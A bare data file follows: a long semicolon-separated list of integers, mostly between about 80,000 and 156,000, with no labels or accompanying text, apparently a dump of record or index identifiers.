81765;81799;81868;81869;81870;81945;81963;81964;81946;81965;81995;82012;82013;82014;82245;82246;82247;82423;82424;82425;82426;82460;82461;82462;82463;82487;82515;82516;82635;82634;82652;82651;82654;82653;82655;80355;80564;82754;82755;82756;82843;82844;82845;82907;82807;83025;83083;83084;83085;83105;83106;83107;83160;83159;80579;83171;83230;83391;83393;83392;83394;83395;83396;83397;83398;83399;83533;83534;83557;83558;83559;83800;83802;83801;83803;83804;80841;83805;83806;83807;83913;83867;83914;80842;83915;83965;83981;83982;84012;83983;84013;80843;84014;84106;84134;84183;84136;84135;84137;84184;84185;84186;84187;84283;84284;84333;84334;84335;84336;84384;84385;84386;84387;84414;84415;84416;84439;84532;84497;84533;84557;84630;84655;84656;84629;84657;84658;80926;80984;84720;84754;84755;84756;84816;84865;84864;84866;84867;84868;80985;84869;84870;84888;84996;84997;84999;84998;85000;85002;85001;85003;80986;85135;85136;85174;85186;80987;85187;85235;85259;85260;80988;85371;85433;85434;85432;85435;85436;85437;85524;85525;85609;85610;85701;85703;85702;85835;85834;85836;85837;85838;85839;85840;85926;80989;85927;85998;86045;80990;86046;86056;86047;86090;86091;86092;80356;86093;86094;86120;86138;86139;86182;86183;86238;86239;86280;86281;86282;86283;86284;86285;86286;86287;86321;86336;86337;86338;86390;86391;86392;86393;86394;86437;80991;86436;86555;86594;86595;86596;80992;86667;86622;86623;86646;86647;86956;86668;86694;80993;86730;86732;86733;86731;86734;80438;80994;86735;86736;86737;86738;86739;86740;86776;86777;86800;86801;86957;86958;86959;86807;86960;86863;86961;86962;86864;86880;86963;86890;86891;86909;86923;86924;86964;81030;86965;87003;87004;87005;87006;81063;87017;81064;87081;87082;81098;87083;87084;87085;87086;87087;87088;87089;87115;87116;81136;87117;87166;87189;87389;87437;87438;87439;81137;87390;87391;81138;87440;87714;87441;87392;81139;87442;87486;87393;87443;87394;81140;87444;87445;87446;87447;81141;87487;87488;87517;87518;81142;87617;87618;87619;87620;87663;87621;87623;87622;87624;87625;87626;87628;87627;87629;87630;87631;87632;87633;87634;81155;87635;87716;87715;87717;81156;81199;87718;87772;88533;93062;93064;93065;93066;88394;93074;93092;93104;93105;93146;88534;93212;93213;93214;93215;93216;93240;93248;88535;93249;93250;93334;93335;93336;88536;93337;93362;93363;93063;90569;93390;93391;93392;93393;93430;93431;93432;88538;93433;93434;93435;93436;93444;93445;93499;93500;93553;93554;93595;93583;93596;93584;93585;88539;93597;93598;93599;88540;93675;93699;93700;93701;93702;93703;93704;93705;93706;93707;93731;93708;93732;93756;93757;93758;93782;93783;93823;93824;93825;93851;93852;88541;93853;93854;93855;93856;93995;88542;93996;93997;93998;93999;94000;94001;94002;94032;94033;88543;94034;88537;94060;94062;94061;94063;94086;88544;94087;94088;94090;94089;94092;94091;94128;87833;94129;94215;94216;94217;94218;94239;94220;94219;94240;94241;94242;94244;94245;94302;94303;94304;94305;94306;94307;94308;94309;94310;94311;94312;94423;94243;88545;94425;94426;88546;94424;94528;94529;88547;94530;94531;94597;94596;94598;94600;94599;88548;94601;94602;94620;94619;94649;94664;88549;94752;94753;94754;94694;94755;94695;94919;94756;88550;88114;94894;88551;94906;94944;94945;88552;94946;94947;94949;94948;94950;94951;88553;94953;94952;95022;95040;95023;95272;95273;95274;95275;95310;95311;88605;95377;95378;95463;95529;95530;95531;95533;95532;95550;95549;95551;95552;88115;95553;95554;95555;95556;95557;95558;95560;95559;95591;95590;95593;95594;95592;95595;95596;95597;95643;95700;95644;95645;95646;95647;95648;95649;95702;95701;95703;95704;95705;95706;95707;95708;95744;95745;95747;95746;95748;95749;95751;95750;95752;95753;95754;95755;95756;95757;95788;95789;95790;95791;95792;95910;95793;88606;95818;95911;95912;95913;96028;96029;91492;96030;95975;88116;95976;96063;96064;96129;96130;88607;96131;96132;96133;88608;96173;96174;96175;96176;88609;96247;96246;96248;88610;88611;88612;88613;88614;88615;88616;88632;88633;88634;88635;88686;88685;88687;88704;88688;88705;88706;88732;88733;88734;88735;88736;88771;88772;88773;88774;88775;88823;88824;88825;88826;88827;88828;88829;88830;93394;88854;88855;88878;88879;88918;88919;88920;88921;88922;88923;88924;88925;94093;88926;88927;88946;94246;88117;94427;88978;88979;88980;89017;89016;88118;89018;89019;89050;89090;89091;88119;89092;95395;89652;89651;89653;89714;88120;89715;89716;89717;89718;89719;88121;89812;89813;89814;88122;89855;89856;89857;89908;89909;89910;89911;88123;89912;89914;89913;89916;89915;89949;88124;89950;89975;89976;88125;90017;89977;90018;90054;88126;90055;90056;90057;90058;90059;90060;90061;88127;90062;88128;90106;90135;90136;90164;90165;90166;90167;88129;90169;90168;90171;90170;90172;90173;90240;90253;90259;90260;90293;90294;90341;90381;90382;90418;90475;90419;90477;90478;90476;90480;90479;90481;90483;90482;90484;90485;90522;90523;90528;90524;90557;90529;88130;90559;90560;90558;90561;90562;90563;90564;90565;90593;90594;90700;88157;90610;90609;90611;90612;90665;90771;90701;90702;90772;90782;90878;90879;90783;90932;90903;90904;90905;90907;90906;90908;90909;90910;90911;90912;90933;91067;91068;90934;90935;91069;90981;90982;90983;90984;90985;90986;91070;91071;91111;91147;91177;91178;91204;91205;91206;88131;91207;91208;91209;91269;87719;88132;91271;91270;91273;91272;91274;91275;91276;91277;91278;91279;88133;91305;89093;91289;91290;91306;91400;91401;91402;91404;91403;91405;91406;91407;91408;91409;91410;90107;91411;91412;91413;91438;88134;91482;91439;91484;91483;88135;91485;91511;91512;88136;91528;91529;91530;91532;91531;91534;91533;88137;91555;91584;91585;91586;88138;91587;91588;91589;91618;91619;88139;91620;91630;88158;91631;91639;91640;91705;91706;91707;91708;91709;91710;91721;91722;91723;91736;91772;91773;91848;91774;91793;91792;88159;91794;91795;91865;88160;91866;91867;91868;91849;91870;91869;88161;91871;88162;87730;88163;91887;91888;88164;91889;91941;88395;91943;91942;91944;91945;88396;91950;91951;91952;91953;88397;91980;90108;91967;90109;91984;88398;91985;91987;91986;88399;92043;92308;92007;92309;92352;92310;92353;92354;92450;92487;92449;92488;92506;92507;92538;92550;92625;92551;92594;92595;92597;92596;92598;92654;92655;88165;92743;92714;92715;88166;92745;92744;92746;88400;92773;92775;92774;92776;92777;92778;92930;92853;92974;92975;92976;92977;92931;92932;92978;92933;88401;92979;92992;92980;92981;92982;92993;92994;88402;93067;93068;93069;96249;96277;96545;102965;96577;102966;102967;103154;103156;103157;103155;103158;103159;96546;103160;103161;103203;103162;96547;103283;103284;96578;96579;103285;103286;103288;103287;103290;103289;103291;103292;103368;103395;96580;103396;103397;103398;103399;103400;103451;103452;96581;103487;96582;96293;103588;103589;103590;103591;103621;103622;103624;103623;103659;103658;96583;103660;103661;103728;103763;96621;103764;103798;103799;103800;103801;96622;103802;104071;104072;104073;96623;104074;104076;104075;104077;104079;104078;104080;104081;104082;104083;104084;104085;104086;104114;104087;104115;96645;104164;104165;104234;104235;104166;96294;96646;104236;104238;104237;96647;104240;104239;104241;104242;104243;104244;104245;104420;104246;104349;104421;104422;104423;104424;104425;104426;104470;104522;104521;104524;104523;104525;104526;104527;96648;104528;104613;104614;104615;104616;104648;96649;104762;104763;104764;104765;96295;96711;104766;104767;104768;104769;104770;104772;104771;96712;104798;105218;105217;105219;96713;105220;105221;105223;105222;105224;105226;105225;105227;105228;105230;105229;105231;105232;105233;105234;105235;105236;105237;105239;105238;105240;105241;105243;105242;105244;105245;96714;105246;105265;105266;105340;105341;105342;105343;105344;105364;105365;105366;96296;105452;105453;96750;105454;105455;105456;105457;105478;105504;105505;96297;96822;96788;96823;96862;96863;96864;96866;96865;96917;96900;96918;96919;96941;96940;96942;96325;96943;96944;96998;96997;96999;97000;97001;96250;97002;97003;97004;97005;97006;97073;97074;97075;97077;97076;97078;97093;97094;97113;97114;97115;97116;97138;97274;97275;97276;97277;97278;97279;97281;97280;97282;97283;97284;97313;97285;97286;97288;97287;97289;97290;97314;97291;97292;97315;97366;97368;97367;97369;96374;97370;96375;96251;97458;97459;97562;97563;97564;97566;97565;97567;97569;97568;97650;97651;97708;97710;97709;97711;97712;97713;97715;97714;97716;97747;97748;97790;97791;97816;97817;97818;97819;97843;97905;99015;99016;99017;99018;99020;99019;99021;99022;99150;96252;99110;99151;99111;99152;99112;99153;99154;99155;99156;99157;99158;99207;99179;99194;99208;99209;99211;99210;99212;99213;99241;99277;99260;99294;99296;99295;99297;96376;99326;99328;99327;96377;99385;99417;99426;99427;99428;99429;99449;99448;99430;99450;99498;99559;99499;99560;99561;96253;99617;99618;99648;99649;99700;99702;99701;99703;99704;99722;99752;99751;99753;96378;99926;99956;99927;99957;99990;99958;100019;100035;100020;100036;100037;100038;100039;100040;100042;100041;100043;100044;100086;100114;100169;100170;100202;96379;100203;100204;100232;100286;96254;100366;100367;96380;100394;100395;100447;100448;100499;96381;100500;100501;100502;100503;96382;100504;100524;100566;100567;96383;100611;96384;100612;100658;100659;100676;100708;100707;100709;100710;100712;100713;100714;96385;100711;100715;100738;100752;100753;100799;100830;100831;100832;96400;100863;100862;100882;96427;100883;100884;100885;101125;101126;101128;101129;101127;103163;101130;101131;101132;101133;101135;101134;101136;101137;101189;101190;101191;101220;101219;101278;101277;101279;101280;101281;101282;101283;101284;101285;101286;101287;101288;101346;101347;101348;101349;101515;101516;101543;101517;96548;101785;101758;101759;101760;101761;101830;96549;101969;101968;96550;101970;101971;102011;101972;102052;96551;102053;102054;96552;102055;102056;102057;102058;96553;96554;102216;102217;102249;96555;102333;102332;102334;102335;96278;102337;102336;102338;102468;102469;96556;102470;102471;102472;102509;96557;102554;102555;102510;102556;102557;102558;96558;102559;102560;102561;102562;102563;102564;102565;102566;96559;102567;102568;102621;102622;102771;102809;102810;102811;102812;102834;102847;102848;102849;102943;102944;102945;102946;102948;102947;102949;102968;102969;105558;117516;117517;117518;117520;117519;106430;117521;117522;117524;117525;117526;117523;106431;117613;117536;117655;117657;117656;117658;117659;117685;106432;117687;117686;106523;117688;117689;117690;117691;117692;117693;117789;117791;117790;117792;117793;117795;117794;117797;117796;117819;117798;117852;117853;117854;117855;117856;106543;117857;117897;117928;117898;117929;117930;117931;117974;117975;117976;117977;117978;106544;117979;117980;117981;117982;117983;117984;117985;117986;117987;106545;118066;118109;118110;118111;118112;118113;117988;118114;106546;118115;118116;106547;118169;106548;118170;106549;118191;118193;118192;118195;106550;118196;118194;118197;118219;118221;118220;118249;118250;118317;106551;106552;118338;118337;118339;118340;118341;118342;118343;118344;118345;106569;118378;118379;118380;118381;118382;118383;118384;118385;106570;118386;118444;118445;118446;118447;118448;118449;106601;118450;118451;118452;118453;118479;118480;118481;105713;118482;106613;118483;118485;118484;118487;118486;118488;118489;118561;118562;106614;118563;118817;118867;118818;118868;118869;118870;118871;118872;118873;118874;118875;118877;118876;118879;118878;118880;118881;106663;118951;105714;106664;106665;119023;119022;119024;119025;119026;119027;119029;119028;119030;119078;119079;106666;119077;119080;119081;119082;119083;119084;106667;119114;119135;119136;106669;106668;119137;119138;119139;119140;119141;106702;119295;119296;119297;106703;119298;119490;119491;119492;119493;119494;119495;106704;119537;105715;119538;119539;119540;119569;119570;119541;119542;119543;119544;119545;119546;119547;106705;119548;119550;119549;119641;119642;119643;106741;106740;119670;119706;119671;119707;119709;106742;119708;119710;119711;119712;119713;119714;119715;106743;119716;119717;119738;119737;119739;119759;119804;106744;119854;119805;106785;119855;119857;119856;106814;119858;119859;119860;119861;119862;119863;119864;119865;119866;119867;119868;119946;119947;119949;119948;119950;106833;119951;119952;119953;106860;106862;106861;106864;106863;106889;106888;106890;106891;106892;106893;106894;106895;105716;106916;106917;106918;106919;106920;105740;106921;106922;106923;106940;106924;106961;105741;105597;106962;106963;106964;106966;106965;106997;106998;106999;107000;105742;107001;107047;107048;107049;107050;107113;107128;107180;107179;107181;107182;107183;107184;107202;107185;107244;107245;107246;105758;107285;107286;108270;108271;108354;108272;108355;108356;108391;108357;108392;108436;108437;108438;108439;108440;108441;108442;108443;108444;108445;108446;108447;108478;108575;108527;108576;108629;105636;106059;108630;108577;108631;108632;108633;108635;108634;106060;108636;108637;108638;108639;108640;108641;108682;106061;108740;108741;108742;108743;108782;108783;108784;106062;108785;108860;108861;106063;108932;108934;108933;108936;108935;108937;108980;108981;106064;109021;109020;106065;109022;109023;109067;109068;106066;109069;109100;109101;109102;106067;109236;109103;109237;109238;109239;109291;109292;109293;109294;109295;109296;105637;109384;109385;109424;109425;109521;109522;109536;106068;109537;109538;109539;109541;109540;106069;109595;106070;109664;106071;109714;109715;109716;109717;109718;109719;106072;109720;109752;109751;109753;109878;109879;109880;109904;109931;109933;109932;109934;109935;109936;110062;110063;110064;110065;110066;110067;110068;105638;106217;110069;110105;110106;110107;110213;110104;110177;110178;110179;110180;110181;110182;110214;110257;110275;110309;106218;110334;110335;110336;110337;106219;110392;110407;110408;110409;110433;110470;110434;110471;110435;110436;110472;110437;110438;105639;106220;110439;110440;110441;110442;106221;106222;110529;110530;110543;106223;110586;110587;110588;110589;110590;110591;110592;110593;106224;110609;110610;110633;110634;110678;110679;110680;110658;110681;110802;110801;110829;110830;110831;110832;110833;110834;110835;110955;110937;110956;110957;105640;110958;110959;110960;110961;110963;110962;110964;110965;111037;111093;111094;111095;111096;111097;111098;111099;111100;111192;111193;111194;111195;111196;111197;106289;111198;111199;106290;111345;111415;111416;111417;111418;111419;111420;111421;111422;111423;111424;111425;111414;111426;111428;111427;111429;111430;111431;111432;111501;111502;111542;111543;111544;111545;105641;111563;111564;111565;111566;111567;111568;111569;111570;111571;111572;111573;111584;111586;111585;111588;111587;111589;111597;111624;111598;111625;111626;111627;111590;111628;111629;111630;111631;106324;111632;111633;111634;111635;111636;111637;111638;111779;106325;111661;111669;111670;111671;111738;111739;111808;111780;106326;111809;111810;111811;106357;111997;112031;111998;106358;111812;111999;112000;112001;112002;112003;105642;106359;112004;112005;112006;112007;106360;112008;112009;112137;112138;106361;112139;112140;106362;112141;112142;112144;112143;112181;112182;112262;112263;106363;112264;112265;112266;112267;112268;112269;112270;112286;112285;117329;117330;117353;117352;117380;117379;106433;106434;117381;117382;117383;117384;117475;117476;117477;120981;121088;121459;123148;123149;123150;123151;123152;123153;123154;123155;123156;123157;123158;123159;121536;123160;123161;123162;123163;123164;121537;123165;123166;123167;123438;123439;123440;123492;123493;123494;123495;123541;123542;121538;123543;123544;123632;123545;123651;123652;123653;123654;123655;123656;123657;123658;123659;123660;123661;123662;123663;123664;123665;123666;123667;123668;123669;123670;123769;123770;123771;123772;123773;123775;123774;123776;123777;123778;123779;123814;123813;123815;123816;123817;123818;123819;123820;123821;123918;123919;123991;123920;123921;123922;123992;124016;124017;124051;124052;124053;124141;124054;124081;124050;124101;124102;124103;124104;124105;124106;124107;124108;124142;124143;124144;124145;124146;124147;124186;124187;124188;124189;124216;124264;124263;124266;124265;124267;124291;124292;124309;124310;124311;124312;124313;121588;124355;124356;124357;124358;124359;121589;124399;124360;124400;124401;124402;124579;124580;124581;124582;124584;124583;121590;124585;124639;124640;124642;124641;121591;124643;124707;124706;124708;124709;124710;124711;124712;124713;124714;124754;124755;124756;124848;124849;124850;124851;121608;125017;121609;125018;125019;125020;125021;125022;125210;125211;125212;125213;125241;125242;121633;125302;125243;125304;125303;125305;125324;125306;125325;125326;125327;125328;121634;125330;125329;125331;125332;125350;125349;125450;125451;125452;125453;125454;125455;125456;125532;125533;125534;125617;125618;125619;125668;125669;125670;125671;125717;125693;125667;125694;125718;125695;125696;125697;125698;125699;125700;125701;125757;125719;122088;125758;125793;125794;125795;125796;125843;122089;125797;125807;125808;125810;125809;122090;125844;122091;125918;125919;125941;125943;125942;125982;125983;126059;126033;126034;126035;126036;126037;126038;126039;126041;126042;126043;126060;126040;122144;126146;126061;126147;126148;121146;126227;126228;126229;126230;126231;126232;122145;126233;126234;126235;126236;126304;122177;126324;126325;126327;126326;126328;126329;126330;126331;126332;126333;122178;126334;126335;122179;126456;126368;126369;126370;126371;122180;126372;126373;126437;126438;126490;126491;126522;126523;126883;126885;126886;126884;126887;126888;126889;122221;122220;126890;122222;126891;126892;126893;126894;126895;126896;126898;126899;126897;122223;126900;126901;126902;126903;126905;126904;126907;126906;126908;126909;126910;126911;126912;126975;126976;126978;126977;126979;126980;127035;127036;127037;127088;127731;127732;127733;127734;127735;127736;122224;127737;127738;122225;127739;127740;127741;127742;122226;127743;127833;127834;127835;127836;127837;127883;122227;122293;121147;127994;127995;127996;127997;127998;127999;128000;128001;128002;128003;128004;128005;128006;128007;128008;128009;128010;128012;128011;128013;122294;128014;122295;128015;122296;128016;128044;128045;128047;128046;122297;122298;128110;128070;128139;128140;122299;128141;121148;122300;128142;128143;122301;122302;128409;128453;128454;128455;122303;122304;128456;128457;122305;128458;128459;128460;128461;128462;128463;128464;128465;128503;128519;128537;128538;122394;128539;128540;128541;122338;128602;128603;128604;128605;128606;128607;128608;121149;131991;128668;128669;128670;128671;122395;128672;128863;128864;128865;128867;128866;128868;128869;122396;128964;128965;128986;128987;122339;129279;129094;129095;129280;129281;129335;129336;129337;129338;129340;129341;129342;129343;129344;129339;129346;129376;129377;129378;129379;129380;129345;129397;129398;121150;129399;129400;129455;129456;129457;129458;129459;129460;129461;129462;129463;129464;129481;129482;129484;129483;129485;129486;129487;129522;129523;129524;129525;129579;129580;129662;129663;129664;129665;129666;129667;129668;129669;129670;129672;129671;129705;129704;129706;129707;129708;129709;129710;129711;129743;129744;129745;129805;129806;129807;129843;129842;129877;129998;129999;130000;122416;122417;130049;122418;130080;130081;130082;130083;130085;130086;130143;130084;130159;130160;130333;130334;130335;130336;130337;130339;130355;130338;130356;130357;130358;130359;130360;130387;130448;130420;122443;130500;130501;122444;130577;130576;130578;130579;130580;130581;122445;130885;130582;130936;130886;130887;130888;130889;130890;130937;130891;130892;130893;130938;122492;130894;130895;130939;130940;131008;122470;131009;131010;131057;131058;131059;131060;131062;131061;131063;122493;131064;131065;131066;122494;131115;131116;131117;131155;131156;131157;131158;131179;131180;131181;122495;131219;131220;131275;131276;131277;131278;122496;131279;131280;131281;131282;131381;131301;131382;131383;131384;131532;131534;131533;131536;131535;131537;131538;131539;131540;131541;131542;131543;131720;131544;122497;131682;131683;131684;131685;131687;131686;131688;131689;131690;131691;131692;131693;131721;122498;131922;131992;131993;131994;131995;131997;131996;122529;132068;132069;132086;132032;132087;132385;132386;132516;132515;132517;122579;122580;122578;122607;122642;122643;122644;122660;122661;122662;122714;122741;122742;122743;122744;122745;122746;122772;122847;122848;122888;122849;122941;122942;122963;122943;123168;123169;123170;123171;123172;123173;123174;123441;123175;123176;123177;123178;123179;123180;123181;121151;123182;123183;123184;123185;123186;123188;123187;123189;121152;123191;123190;121153;123192;121154;123194;123193;123195;123196;123197;121155;123199;123198;123200;123201;123202;123203;123205;123204;121156;123206;123207;123208;123209;123210;123211;123212;123213;123214;121157;123216;123215;123218;123217;123219;121281;123220;123221;123222;123223;121282;123224;123225;123227;123228;121283;123229;123230;123231;123232;123233;123234;123235;123236;123237;123226;123238;123239;123240;123241;123242;123243;123244;123245;123246;121284;123247;123248;123249;123250;123251;121285;123252;123253;123254;123255;123256;123257;123258;123259;123261;123262;123442;123263;123264;123265;123266;123260;121286;123267;123268;123270;123271;123443;123269;123272;121287;123273;123275;123274;123277;123276;121288;123278;123279;123280;123281;123282;123283;123284;123285;121289;123286;123287;121290;123289;123288;123290;123291;123292;123293;121291;123294;123295;123296;123297;123298;123299;123300;123301;123302;123303;123305;123304;123307;123306;123309;123308;123311;123310;123312;123313;123314;123315;123316;123317;123318;123319;123320;123321;123322;123323;123324;123325;123326;123327;123328;123330;123331;123332;123333;123334;123335;123336;123329;123337;123338;121089;123340;123339;123341;123342;121339;123344;123343;121340;123345;123346;123347;123348;123349;123350;123351;121411;123352;123353;123354;121412;123355;123356;123357;123358;123359;121413;123360;123361;121414;123362;123363;121415;123364;123365;121428;123367;121090;123366;121429;123368;123369;123370;121430;123371;123373;123372;123374;123375;121431;123376;123377;123378;121460;123379;123380;123381;123382;121461;123383;123384;123385;123386;123387;123388;121462;123389;123390;123391;123392;123393;121463;123394;123395;123396;123398;121464;123399;123397;123400;123401;123402;123403;123404;123405;123406;123407;123408;138668;138669;138670;138671;138672;138673;138674;138675;138785;138786;133251;138787;138788;138789;138790;138828;138829;133252;138977;138978;138980;138979;138981;133253;138982;138984;138983;138985;138987;138988;138989;138986;139012;139013;139014;139015;139016;139017;139019;139018;132904;139020;139021;139168;139221;139280;139022;139281;139302;133288;139303;139304;139305;139306;139355;139356;139357;139443;139444;139445;139401;139446;139447;139448;133340;139449;139450;139451;139477;139478;139558;139559;139560;139561;139562;133341;139563;139565;139564;139591;139644;139645;139646;139648;139647;139650;139649;139651;139652;133342;139653;133343;139654;139655;139765;133344;133345;139767;139768;139769;139766;139780;139896;139897;139898;139899;139900;139901;139902;139903;140021;140020;140022;140023;140024;140073;140075;140074;140077;140076;140078;140079;140080;140081;140170;140171;140172;140173;140175;140174;140240;141904;140366;140367;140368;140369;140365;140371;140370;140372;140373;140374;140375;140376;140377;140442;140444;140443;140445;140681;140509;140510;140511;132905;140569;140570;140571;140572;140573;140574;140610;140682;140683;140684;140685;140686;140687;140688;140689;133346;140741;140690;133347;140691;140726;140692;140742;140727;132906;140743;140744;140764;141069;141151;141070;141071;140797;141073;141072;141152;141153;141154;141074;141075;141156;141076;141155;141078;141077;141079;141080;141157;141081;141158;141159;141160;141162;141163;141164;141165;141161;141166;133488;141167;141168;141169;141276;133489;141281;141279;133490;141294;141390;133491;141387;141382;133492;141388;141411;141409;141462;141529;141507;141513;141506;141534;141523;141525;141514;141530;141533;141528;141504;141560;141559;133519;141839;141719;141662;141840;141925;141905;141893;141888;141890;141884;141898;142042;142039;141927;141929;141924;141926;142044;142095;142135;142114;142078;142108;142115;142097;142183;142188;142165;142194;142185;142162;142196;142190;142163;142207;142181;142150;142186;142178;142149;142572;142540;142324;142522;142560;142555;142583;142549;142506;142575;142537;142550;142524;142526;142631;142630;142628;142620;142615;133592;142627;142629;142638;142836;142838;142852;142829;142831;142840;133593;142853;142915;142921;142925;142945;142950;142944;142938;142942;142956;142937;142949;142917;142929;142948;142953;142941;142922;143141;143100;143001;143101;143134;143144;143145;143146;143143;143192;143180;143184;143182;143179;143190;143181;143168;132763;132907;143225;143298;143343;143289;143338;143352;143333;143345;143320;143290;143301;143295;143340;143303;143348;143314;143299;143335;143316;133644;143327;143310;143337;143355;143318;143321;143302;143341;143317;143304;143331;143322;143324;143311;133645;143297;143312;133666;143347;133667;143319;143342;143292;143357;143328;143339;132908;143508;143504;143496;143507;143462;143398;143499;143452;133668;143457;133669;143463;143521;143455;143460;143456;143497;143492;143514;143506;143522;143523;143529;143511;143513;143545;143498;143547;143550;143546;143540;143549;133714;143539;143536;143538;143548;143537;143542;132909;133757;143592;144033;144020;133758;144120;144317;144309;144316;144308;144312;145351;145279;144321;145335;145358;144313;145338;145353;145307;145382;145334;145313;145297;133759;145277;145329;145374;133760;145331;145360;145280;145368;145362;145372;145332;145294;145323;145322;145326;145389;145293;145301;145345;133827;145348;145359;145350;145347;133828;145324;145285;145400;145317;145375;145385;132910;134073;134152;134153;134154;134155;134156;134157;134193;134194;134195;134196;134197;134198;134279;134280;134281;132764;134282;134283;134284;134347;132911;134348;134349;134362;134397;134398;134617;134618;134619;134620;134559;132912;134696;134822;134755;134823;134851;134932;134933;134934;132913;134935;134936;135161;135003;135005;135006;135004;135008;135007;135009;135010;135022;135162;135163;135220;135221;135222;132914;135264;135263;135383;135265;135385;135384;135386;135446;135447;135448;135449;135450;135451;132915;135452;135453;135454;135577;135578;135670;135749;135750;136004;136005;136007;136008;136006;136009;132916;136023;136010;136012;136072;136073;132917;136011;136306;136307;132918;132919;136308;136309;132920;136311;136310;136312;132848;132949;136314;136313;136315;136316;136317;132950;132951;136449;136450;136451;136453;136452;136454;136455;136456;136457;136459;136458;136461;136460;136489;136488;136490;136491;136492;133031;136691;136872;136873;136874;136875;136876;136877;133130;136878;136879;136880;136881;133131;136882;136883;136884;136885;136886;136888;136887;136889;136959;136960;136961;136962;136992;136963;136993;136994;136996;136995;136997;137131;137132;137227;137228;137229;137230;137231;137251;137349;133132;137350;137351;137392;138676;138677;132849;133133;138678;138680;138681;138679;138682;138683;138684;138685;138686;138687;138688;138689;138690;138691;138692;133170;138693;138694;138696;138695;133171;138697;138698;138700;138699;133172;138701;138703;138702;133173;138704;138705;138706;138708;138707;138709;133174;138711;138710;138712;138713;138714;138715;138716;138717;138718;138719;138720;138721;138990;138723;138722;133198;138724;138725;138726;138728;138729;133199;138730;138731;138727;138732;139307;138991;138733;138734;138736;138735;138737;138738;138739;133200;138740;138741;138742;138743;138744;138746;138745;138747;138748;138749;138751;138750;138752;138753;138754;138755;138756;138757;145336;151525;151526;151527;145370;151528;151615;151619;151702;151806;151822;151824;151816;151823;145395;151814;151818;151841;151853;151840;145278;151938;151936;151937;152017;152008;152009;152058;152057;152063;152064;152065;152219;152261;152257;152262;152391;152392;152394;152471;152474;152477;152470;152463;152462;152456;152457;152469;152466;152460;152467;152473;152472;152515;152563;152561;152647;152693;152692;152694;152696;152731;152719;152722;152730;152736;152738;152770;152756;152755;152758;152769;152840;152841;152839;152852;152837;152844;145377;152838;152876;152875;152896;152895;152900;152958;152956;152942;153000;153005;145284;153025;153029;153116;153114;153113;153108;153107;145356;153195;153218;153251;153392;153394;153393;153395;153415;145330;153414;153457;153455;153453;153452;153454;145344;153530;145295;153537;153533;153529;153578;153667;153669;153778;153783;153782;153796;145354;153847;153875;153874;154006;154008;154007;154010;154012;154009;154079;154192;154196;154191;145361;154206;154215;154214;154228;154216;154209;154211;145383;154213;154207;154282;145306;154284;154513;154612;154748;154770;145314;154759;154764;154761;154762;154769;154766;152835;154767;154763;154768;154765;154755;154760;154757;154758;154756;154822;154865;154867;145311;154866;154863;154860;154864;154952;154951;154946;154978;154976;155345;145339;154975;155355;155362;155358;145394;155583;155621;155356;155652;155657;155660;155662;145273;155714;155726;145399;155859;155823;155860;155872;145305;155887;155871;155879;155886;145376;155875;155873;156144;156130;156146;156131;156151;156138;156150;156142;156152;156179;156135;156192;156185;145435;156218;156216;156215;156217;156273;145431;156270;156274;156276;145434;156279;156316;156319;156317;156340;156341;156436;151685;156426;156434;156433;156395;156437;145423;151688;151704;145485;151712;151747;145525;145530;145729;151710;151726;151709;151736;151684;151752;151722;151739;151706;151729;151719;151746;151721;151724;151707;151728;151717;151699;152119;151753;145775;151683;151749;145735;151735;145710;151708;145720;151693;151714;145762;151718;151692;151744;151713;151731;151730;151756;145736;151705;151725;151711;151737;151686;151751;151741;151716;145767;145768;145746;151732;151734;151697;151742;151694;151715;151696;151698;151755;151750;151740;151703;151700;151695;146144;146513;146162;151720;151743;151701;151687;151733;151754;151748;151738;151727;151691;151723;151745;146274;146287;151817;151820;151819;145381;151839;151851;151838;151860;146293;151866;151847;151935;146282;151941;151940;152011;151939;152013;152010;152007;152118;145355;146298;152154;152147;152166;146320;152179;152196;145365;152218;152256;152263;152250;152249;152260;152258;146325;152255;152259;152393;146317;152459;152553;152554;146355;152552;152644;152569;152624;152562;146503;145310;146518;152646;146524;152645;146510;152679;152695;146506;152733;152732;152734;152721;152720;152728;152727;152726;146508;152724;152729;152735;152768;152771;152757;152767;152799;146507;152798;152848;152850;152849;146528;152894;152897;152962;152960;152963;152941;153008;153007;153009;153004;153003;153002;153006;153001;152999;152998;153030;146501;153115;153117;153118;153188;146715;153187;153186;153250;153245;146662;153244;146745;146676;153413;146688;146649;153451;153479;146750;153543;153541;153579;153599;153594;153596;153595;153598;153597;146858;153771;153780;153792;153790;153913;153912;153911;153914;153901;146852;153909;146851;153968;154011;154091;154103;146836;154069;154105;152725;154064;146831;146918;154104;154186;146908;154193;154187;154208;154243;146897;154283;154289;154285;154286;146888;154281;154287;146898;154290;154280;154288;154606;154589;154611;154512;154664;154665;154661;154660;146911;146914;146916;154743;154889;154890;154892;154896;154898;154945;146938;155012;155010;155009;155008;155191;155299;155177;155357;155379;155382;155380;155383;147159;147158;155381;147157;147161;147149;155656;155663;147160;155664;155665;147150;155696;155697;155701;155777;155744;155771;155773;155775;155778;147174;155774;155772;155770;155779;147184;155776;147173;155826;155825;147189;155857;147178;147606;147563;155877;155888;155824;155878;155876;155885;155874;155881;155880;155883;155884;155932;155934;145304;156145;156143;156141;156154;147783;147799;147779;156137;147774;156136;156149;147794;147776;156153;145308;147780;156140;156180;156177;156139;156181;148839;156252;156219;147845;156277;156268;147844;156269;156275;156271;156278;156272;147846;156339;156435;156448;147850;156447;147860;147858;145325;147853;147931;147852;147929;147930;147925;147927;147924;145290;148066;148045;145357;148159;148148;148141;148152;148153;148179;148203;148176;148209;148210;148315;148308;148313;148310;148309;148321;148325;148324;148384;148385;148411;148412;148417;148409;148431;148435;148436;145390;148432;148439;148535;148513;148438;145298;148606;148614;148588;148699;145379;148696;148759;148763;148746;149627;149555;149605;149564;149634;145340;150114;149553;149548;145283;149640;149613;149628;149616;149533;149545;145320;149589;149637;149554;145275;149603;149536;149573;149534;149580;149562;149570;149557;149598;149577;145371;149629;145299;149590;145286;149636;149558;149611;149569;149594;149549;149596;149541;149579;149571;149612;149537;149550;150103;149530;149614;149567;145396;149584;149572;149539;150090;149566;149641;145312;145387;149600;149560;149639;149542;149602;149884;149886;145287;149887;149892;149890;149891;145292;149896;149895;149882;149881;149893;149894;145373;149885;145392;150003;150089;150113;150098;150087;150094;145342;150088;150104;150183;145398;150206;150269;150261;150275;150259;150248;150256;150251;150276;145393;150304;150319;150452;150466;150474;150315;150471;150455;150457;150461;150755;151080;150754;151079;151073;151076;151071;151074;151083;151078;151072;151082;145366;151081;151075;151077;151062;151060;151024;151067;151058;151068;151023;151066;145328;151069;151054;151061;151022;151053;151070;151056;